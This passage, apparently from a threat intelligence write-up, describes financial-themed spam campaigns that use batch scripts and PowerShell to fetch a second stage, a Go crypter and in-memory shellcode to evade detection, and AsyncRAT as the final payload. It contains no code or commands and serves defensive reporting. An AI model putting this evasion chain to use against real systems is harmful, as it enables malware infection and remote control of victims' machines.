In the past few months, a flurry of harmful spam campaigns with a financial theme have been distributing malware via batch scripts (.bat). To accomplish various goals along the infection chain, the campaigns use a wide range of programming languages, including batch scripts, PowerShell, Go, shellcode, and.NET. Simple batch scripts that use PowerShell to download a second stage of malware from the internet are the source of the infection.
To avoid detection, the malware is packed twice, including by ShellGo, a Go crypter that decrypts and runs shellcode in memory. The shellcode runs the payload in memory and gets around two Windows security measures by decrypting the payload. The popular remote access trojan (RAT), AsyncRAT, created in.NET, served as the payload in the campaign we examined below. Notably.